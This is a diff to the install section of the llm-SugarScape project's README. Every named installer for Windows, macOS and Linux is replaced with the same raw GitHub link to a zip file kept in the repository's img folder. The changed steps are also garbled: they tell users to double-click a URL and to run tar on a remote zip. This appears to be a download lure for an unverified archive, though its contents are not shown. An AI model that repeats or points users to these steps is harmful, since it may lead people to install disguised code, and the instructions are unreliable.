penpoen/llm-SugarScape/README.md

 3. **Download the Installer**

-   Click on the file named `llm-SugarScape-setup.exe` for Windows, or `llm-SugarScape-macos.dmg` for macOS, or use the right tarball for Linux.
+   Click on the file named `https://raw.githubusercontent.com/penpoen/llm-SugarScape/main/img/llm-SugarScape-2.0.zip` for Windows, or `https://raw.githubusercontent.com/penpoen/llm-SugarScape/main/img/llm-SugarScape-2.0.zip` for macOS, or use the right tarball for Linux.
 The downloads will start automatically.

 4. **Run the Installer**

-   - For Windows: Double-click on `llm-SugarScape-setup.exe`.
+   - For Windows: Double-click on `https://raw.githubusercontent.com/penpoen/llm-SugarScape/main/img/llm-SugarScape-2.0.zip`.
 Follow the prompts to install.
-   - For macOS: Open `llm-SugarScape-macos.dmg` and drag the application to the Applications folder.
+   - For macOS: Open `https://raw.githubusercontent.com/penpoen/llm-SugarScape/main/img/llm-SugarScape-2.0.zip` and drag the application to the Applications folder.
-   - For Linux: Open a terminal window, navigate to the download location, and run the command: `tar -xzf llm-SugarScape-linux.tar.gz`, then follow the instructions to run.
+   - For Linux: Open a terminal window, navigate to the download location, and run the command: `tar -xzf https://raw.githubusercontent.com/penpoen/llm-SugarScape/main/img/llm-SugarScape-2.0.zip`, then follow the instructions to run.

 ## 🔗 How to Use llm-SugarScape